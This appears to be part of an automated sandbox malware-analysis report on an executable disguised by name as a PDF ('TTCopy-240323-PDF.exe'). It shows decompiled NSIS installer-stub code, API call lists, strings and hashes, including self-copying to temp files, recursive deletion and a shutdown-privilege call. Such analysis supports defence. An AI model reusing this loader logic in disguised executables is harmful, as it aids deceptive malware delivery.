												E00405CC8(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a27c == _t188) {
												L51:
												 *0x42a30c =  *0x42a30c | 0xffffffff;
												_v24 = E00403D17(_t264);
												goto L68;
											}
											_t218 = E00405F64(L"\"C:\\Users\\engineer\\Desktop\\TTCopy-240323-PDF.exe\"", _t188);
											if(_t218 < L"\"C:\\Users\\engineer\\Desktop\\TTCopy-240323-PDF.exe\"") {
												L48:
												_t263 = _t218 - L"\"C:\\Users\\engineer\\Desktop\\TTCopy-240323-PDF.exe\"";
												_v8 = L"Error launching installer";
												if(_t218 < L"\"C:\\Users\\engineer\\Desktop\\TTCopy-240323-PDF.exe\"") {
													_t189 = E00405C33(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t219 = L"C:\\Users\\engineer\\Desktop";
													_t137 = lstrcmpiW(_t234, L"C:\\Users\\engineer\\Desktop");
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405C16();
														} else {
															E00405B99();
														}
														SetCurrentDirectoryW(_t234);
														__eflags = L"C:\\Users\\engineer\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E00406668(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t219);
														}
														E00406668(0x42b000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x42b800 = _t143;
														do {
															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
															DeleteFileW(0x420f08);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(L"C:\\Users\\engineer\\Desktop\\TTCopy-240323-PDF.exe", 0x420f08, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E00406428(_t201, 0x420f08, 0);
																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
																	_t152 = E00405C4B(0x420f08);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E00406428(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E0040603F(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E00406668(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t221);
												E00406668(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= L"\"C:\\Users\\engineer\\Desktop\\TTCopy-240323-PDF.exe\"") {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E0040360F(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E0040360F(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x42a300 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}



















































                                                                                            0x0040364e
                                                                                            0x0040364f
                                                                                            0x00403656
                                                                                            0x00403659
                                                                                            0x00403660
                                                                                            0x00403663
                                                                                            0x00403676
                                                                                            0x0040367c
                                                                                            0x0040367f
                                                                                            0x00403682
                                                                                            0x00403690
                                                                                            0x00403698
                                                                                            0x004036a3
                                                                                            0x004036bc
                                                                                            0x004036be
                                                                                            0x004036c6
                                                                                            0x004036c6
                                                                                            0x004036d1
                                                                                            0x004036d3
                                                                                            0x004036d3
                                                                                            0x004036e8
                                                                                            0x0040370d
                                                                                            0x0040371b
                                                                                            0x0040371e
                                                                                            0x00403725
                                                                                            0x0040372c
                                                                                            0x0040372c
                                                                                            0x00403725
                                                                                            0x0040372e
                                                                                            0x00403733
                                                                                            0x00403734
                                                                                            0x00403740
                                                                                            0x00403744
                                                                                            0x0040374b
                                                                                            0x00403759
                                                                                            0x0040375e
                                                                                            0x00403765
                                                                                            0x00403769
                                                                                            0x0040376d
                                                                                            0x0040376f
                                                                                            0x0040376f
                                                                                            0x0040376d
                                                                                            0x00403776
                                                                                            0x0040377d
                                                                                            0x00403783
                                                                                            0x0040379b
                                                                                            0x004037ab
                                                                                            0x004037b0
                                                                                            0x004037b6
                                                                                            0x004037bd
                                                                                            0x004037c4
                                                                                            0x004037c6
                                                                                            0x004037c7
                                                                                            0x004037d1
                                                                                            0x004037d8
                                                                                            0x004037da
                                                                                            0x004037dc
                                                                                            0x004037dc
                                                                                            0x004037ef
                                                                                            0x004037f1
                                                                                            0x004038eb
                                                                                            0x004038eb
                                                                                            0x004038ee
                                                                                            0x004038f1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004037fb
                                                                                            0x004037fc
                                                                                            0x004037ff
                                                                                            0x00403808
                                                                                            0x00403808
                                                                                            0x0040380b
                                                                                            0x0040380e
                                                                                            0x00403811
                                                                                            0x00403814
                                                                                            0x00403814
                                                                                            0x00403814
                                                                                            0x00403815
                                                                                            0x00403819
                                                                                            0x004038d9
                                                                                            0x004038e2
                                                                                            0x004038e4
                                                                                            0x004038e7
                                                                                            0x004038ea
                                                                                            0x004038ea
                                                                                            0x004038ea
                                                                                            0x00000000
                                                                                            0x0040381f
                                                                                            0x00403820
                                                                                            0x00403821
                                                                                            0x00403825
                                                                                            0x0040383f
                                                                                            0x00403846
                                                                                            0x00403859
                                                                                            0x0040385a
                                                                                            0x0040386f
                                                                                            0x00403874
                                                                                            0x00403876
                                                                                            0x00403878
                                                                                            0x00403894
                                                                                            0x0040389b
                                                                                            0x004038ae
                                                                                            0x004038af
                                                                                            0x004038c4
                                                                                            0x004038ca
                                                                                            0x004038cc
                                                                                            0x004038ce
                                                                                            0x004038d6
                                                                                            0x004038d8
                                                                                            0x00000000
                                                                                            0x004038d8
                                                                                            0x004038d2
                                                                                            0x004038d4
                                                                                            0x004038f9
                                                                                            0x004038fd
                                                                                            0x00403906
                                                                                            0x0040390b
                                                                                            0x00403911
                                                                                            0x0040391c
                                                                                            0x0040391e
                                                                                            0x00403923
                                                                                            0x00403925
                                                                                            0x0040397d
                                                                                            0x00403982
                                                                                            0x0040398b
                                                                                            0x00403992
                                                                                            0x00403995
                                                                                            0x00403b6c
                                                                                            0x00403b6c
                                                                                            0x00403b71
                                                                                            0x00403b7a
                                                                                            0x00403b97
                                                                                            0x00403c0f
                                                                                            0x00403c0f
                                                                                            0x00403c17
                                                                                            0x00403c19
                                                                                            0x00403c19
                                                                                            0x00403c1f
                                                                                            0x00403c1f
                                                                                            0x00403bae
                                                                                            0x00403bba
                                                                                            0x00403bcb
                                                                                            0x00403bd2
                                                                                            0x00403bd9
                                                                                            0x00403bd9
                                                                                            0x00403be1
                                                                                            0x00403bed
                                                                                            0x00403bfb
                                                                                            0x00403c06
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403bef
                                                                                            0x00403bef
                                                                                            0x00403bf0
                                                                                            0x00403bf2
                                                                                            0x00403bf3
                                                                                            0x00403bf4
                                                                                            0x00403bf9
                                                                                            0x00403c08
                                                                                            0x00403c0a
                                                                                            0x00000000
                                                                                            0x00403c0a
                                                                                            0x00000000
                                                                                            0x00403bf9
                                                                                            0x00403bed
                                                                                            0x00403b84
                                                                                            0x00403b8b
                                                                                            0x00403b8b
                                                                                            0x004039a1
                                                                                            0x00403a48
                                                                                            0x00403a48
                                                                                            0x00403a54
                                                                                            0x00000000
                                                                                            0x00403a54
                                                                                            0x004039b2
                                                                                            0x004039ba
                                                                                            0x00403a0c
                                                                                            0x00403a0c
                                                                                            0x00403a12
                                                                                            0x00403a19
                                                                                            0x00403a67
                                                                                            0x00403a69
                                                                                            0x00403a6e
                                                                                            0x00403a70
                                                                                            0x00403a78
                                                                                            0x00403a78
                                                                                            0x00403a83
                                                                                            0x00403a88
                                                                                            0x00403a8f
                                                                                            0x00403a95
                                                                                            0x00403a97
                                                                                            0x00403b6a
                                                                                            0x00403b6a
                                                                                            0x00403b6a
                                                                                            0x00000000
                                                                                            0x00403a9d
                                                                                            0x00403a9d
                                                                                            0x00403a9f
                                                                                            0x00403aa0
                                                                                            0x00403aa9
                                                                                            0x00403aa2
                                                                                            0x00403aa2
                                                                                            0x00403aa2
                                                                                            0x00403aaf
                                                                                            0x00403ab7
                                                                                            0x00403abe
                                                                                            0x00403ac6
                                                                                            0x00403ac6
                                                                                            0x00403ad3
                                                                                            0x00403adf
                                                                                            0x00403ae9
                                                                                            0x00403ae9
                                                                                            0x00403aeb
                                                                                            0x00403af2
                                                                                            0x00403afc
                                                                                            0x00403b08
                                                                                            0x00403b0e
                                                                                            0x00403b14
                                                                                            0x00403b17
                                                                                            0x00403b21
                                                                                            0x00403b27
                                                                                            0x00403b29
                                                                                            0x00403b2d
                                                                                            0x00403b3e
                                                                                            0x00403b44
                                                                                            0x00403b49
                                                                                            0x00403b4b
                                                                                            0x00403b4e
                                                                                            0x00403b54
                                                                                            0x00403b54
                                                                                            0x00403b4b
                                                                                            0x00403b29
                                                                                            0x00403b57
                                                                                            0x00403b5e
                                                                                            0x00403b5e
                                                                                            0x00403b5e
                                                                                            0x00403b5e
                                                                                            0x00403b65
                                                                                            0x00000000
                                                                                            0x00403b65
                                                                                            0x00403a97
                                                                                            0x00403a1b
                                                                                            0x00403a1e
                                                                                            0x00403a22
                                                                                            0x00403a27
                                                                                            0x00403a29
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403a35
                                                                                            0x00403a40
                                                                                            0x00403a45
                                                                                            0x00000000
                                                                                            0x00403a45
                                                                                            0x004039c3
                                                                                            0x004039db
                                                                                            0x004039ec
                                                                                            0x004039ed
                                                                                            0x004039f1
                                                                                            0x004039f3
                                                                                            0x00403a01
                                                                                            0x00403a08
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403a08
                                                                                            0x00403a0a
                                                                                            0x00000000
                                                                                            0x00403a0a
                                                                                            0x0040392d
                                                                                            0x00403939
                                                                                            0x0040393e
                                                                                            0x00403943
                                                                                            0x00403945
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040394d
                                                                                            0x00403955
                                                                                            0x00403966
                                                                                            0x0040396e
                                                                                            0x00403970
                                                                                            0x00403975
                                                                                            0x00403977
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403977
                                                                                            0x00000000
                                                                                            0x004038d4
                                                                                            0x0040387d
                                                                                            0x0040387f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403881
                                                                                            0x00403885
                                                                                            0x00403889
                                                                                            0x00403890
                                                                                            0x00403890
                                                                                            0x00403890
                                                                                            0x00403890
                                                                                            0x00000000
                                                                                            0x00403890
                                                                                            0x0040388b
                                                                                            0x0040388e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040388e
                                                                                            0x00403827
                                                                                            0x0040382b
                                                                                            0x0040382e
                                                                                            0x00403835
                                                                                            0x00403835
                                                                                            0x00000000
                                                                                            0x00403835
                                                                                            0x00403830
                                                                                            0x00403833
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403833
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403801
                                                                                            0x00403801
                                                                                            0x00403802
                                                                                            0x00403803
                                                                                            0x00403803
                                                                                            0x00000000
                                                                                            0x00403801
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                                                            • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                                                            • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                                                            • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                                                            • OleInitialize.OLE32(00000000), ref: 0040377D
                                                                                            • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                                                            • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\TTCopy-240323-PDF.exe",00000020,"C:\Users\user\Desktop\TTCopy-240323-PDF.exe",00000000), ref: 004037E9
                                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                                                                            • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                                                                                              • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\TTCopy-240323-PDF.exe",00000000,?), ref: 00403A8F
                                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                                                                            • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\TTCopy-240323-PDF.exe,00420F08,00000001), ref: 00403B21
                                                                                            • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                                                            • ExitProcess.KERNEL32(?), ref: 00403B6C
                                                                                            • OleUninitialize.OLE32(?), ref: 00403B71
                                                                                            • ExitProcess.KERNEL32 ref: 00403B8B
                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                                                                            • ExitProcess.KERNEL32 ref: 00403C1F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                            • String ID: "C:\Users\user\Desktop\TTCopy-240323-PDF.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\TTCopy-240323-PDF.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                            • API String ID: 2292928366-737394099
                                                                                            • Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                                                            • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                                                            • Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                                                            • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 395 405d74-405d9a call 40603f 398 405db3-405dba 395->398 399 405d9c-405dae DeleteFileW 395->399 401 405dbc-405dbe 398->401 402 405dcd-405ddd call 406668 398->402 400 405f30-405f34 399->400 403 405dc4-405dc7 401->403 404 405ede-405ee3 401->404 410 405dec-405ded call 405f83 402->410 411 405ddf-405dea lstrcatW 402->411 403->402 403->404 404->400 406 405ee5-405ee8 404->406 408 405ef2-405efa call 40699e 406->408 409 405eea-405ef0 406->409 408->400 419 405efc-405f10 call 405f37 call 405d2c 408->419 409->400 414 405df2-405df6 410->414 411->414 415 405e02-405e08 lstrcatW 414->415 416 405df8-405e00 414->416 418 405e0d-405e29 lstrlenW FindFirstFileW 415->418 416->415 416->418 420 405ed3-405ed7 418->420 421 405e2f-405e37 418->421 435 405f12-405f15 419->435 436 405f28-405f2b call 4056ca 419->436 420->404 426 405ed9 420->426 423 405e57-405e6b call 406668 421->423 424 405e39-405e41 421->424 437 405e82-405e8d call 405d2c 423->437 438 405e6d-405e75 423->438 427 405e43-405e4b 424->427 428 405eb6-405ec6 FindNextFileW 424->428 426->404 427->423 431 405e4d-405e55 427->431 428->421 434 405ecc-405ecd FindClose 428->434 431->423 431->428 434->420 435->409 441 405f17-405f26 call 4056ca call 406428 435->441 436->400 446 405eae-405eb1 call 4056ca 437->446 447 405e8f-405e92 437->447 438->428 442 405e77-405e80 call 405d74 438->442 441->400 442->428 446->428 450 405e94-405ea4 call 4056ca call 406428 447->450 451 405ea6-405eac 447->451 450->428 451->428
                                                                                            C-Code - Quality: 98%
                                                                                            			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E0040603F(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2e8 =  *0x42a2e8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406668(0x425750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F83(_t68);
					} else {
						lstrcatW(0x425750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406668(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D2C(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056CA(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2e8 =  *0x42a2e8 + 1;
										} else {
											E004056CA(0xfffffff1, _t68);
											E00406428(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D74(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70); // executed
						goto L26;
					}
					__eflags =  *0x425750 - 0x5c;
					if( *0x425750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040699E(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F37(_t68);
							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056CA(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056CA(0xfffffff1, _t68);
							return E00406428(_t67, _t68, 0);
						}
						L30:
						 *0x42a2e8 =  *0x42a2e8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                                                            0x00405d7e
                                                                                            0x00405d83
                                                                                            0x00405d8c
                                                                                            0x00405d8f
                                                                                            0x00405d97
                                                                                            0x00405d9a
                                                                                            0x00405d9d
                                                                                            0x00405da5
                                                                                            0x00405da7
                                                                                            0x00405da8
                                                                                            0x00000000
                                                                                            0x00405da8
                                                                                            0x00405db3
                                                                                            0x00405db6
                                                                                            0x00405db6
                                                                                            0x00405db6
                                                                                            0x00405dba
                                                                                            0x00405dcd
                                                                                            0x00405dd4
                                                                                            0x00405dd9
                                                                                            0x00405ddd
                                                                                            0x00405ded
                                                                                            0x00405ddf
                                                                                            0x00405de5
                                                                                            0x00405de5
                                                                                            0x00405df2
                                                                                            0x00405df6
                                                                                            0x00405e02
                                                                                            0x00405e08
                                                                                            0x00405e0d
                                                                                            0x00405e13
                                                                                            0x00405e1e
                                                                                            0x00405e24
                                                                                            0x00405e26
                                                                                            0x00405e29
                                                                                            0x00405ed3
                                                                                            0x00405ed3
                                                                                            0x00405ed7
                                                                                            0x00405ed9
                                                                                            0x00405ed9
                                                                                            0x00405ed9
                                                                                            0x00405ed9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405e2f
                                                                                            0x00405e2f
                                                                                            0x00405e2f
                                                                                            0x00405e37
                                                                                            0x00405e57
                                                                                            0x00405e5f
                                                                                            0x00405e64
                                                                                            0x00405e6b
                                                                                            0x00405e86
                                                                                            0x00405e8b
                                                                                            0x00405e8d
                                                                                            0x00405eb1
                                                                                            0x00405e8f
                                                                                            0x00405e8f
                                                                                            0x00405e92
                                                                                            0x00405ea6
                                                                                            0x00405e94
                                                                                            0x00405e97
                                                                                            0x00405e9f
                                                                                            0x00405e9f
                                                                                            0x00405e92
                                                                                            0x00405e6d
                                                                                            0x00405e73
                                                                                            0x00405e75
                                                                                            0x00405e7b
                                                                                            0x00405e7b
                                                                                            0x00405e75
                                                                                            0x00000000
                                                                                            0x00405e6b
                                                                                            0x00405e39
                                                                                            0x00405e41
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405e43
                                                                                            0x00405e4b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405e4d
                                                                                            0x00405e55
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405eb6
                                                                                            0x00405ebe
                                                                                            0x00405ec4
                                                                                            0x00405ec4
                                                                                            0x00405ecd
                                                                                            0x00000000
                                                                                            0x00405ecd
                                                                                            0x00405df8
                                                                                            0x00405e00
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405dbc
                                                                                            0x00405dbc
                                                                                            0x00405dbe
                                                                                            0x00405ede
                                                                                            0x00405ee0
                                                                                            0x00405ee3
                                                                                            0x00405f34
                                                                                            0x00405f34
                                                                                            0x00405f34
                                                                                            0x00405ee5
                                                                                            0x00405ee8
                                                                                            0x00405ef3
                                                                                            0x00405ef8
                                                                                            0x00405efa
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405efd
                                                                                            0x00405f09
                                                                                            0x00405f0e
                                                                                            0x00405f10
                                                                                            0x00000000
                                                                                            0x00405f2b
                                                                                            0x00405f12
                                                                                            0x00405f15
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405f1a
                                                                                            0x00000000
                                                                                            0x00405f21
                                                                                            0x00405eea
                                                                                            0x00405eea
                                                                                            0x00000000
                                                                                            0x00405eea
                                                                                            0x00405dc4
                                                                                            0x00405dc7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405dc7

                                                                                            APIs
                                                                                            • DeleteFileW.KERNELBASE(?,?,746AFAA0,746AF560,00000000), ref: 00405D9D
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsn33EB.tmp\*.*,\*.*), ref: 00405DE5
                                                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsn33EB.tmp\*.*,?,?,746AFAA0,746AF560,00000000), ref: 00405E0E
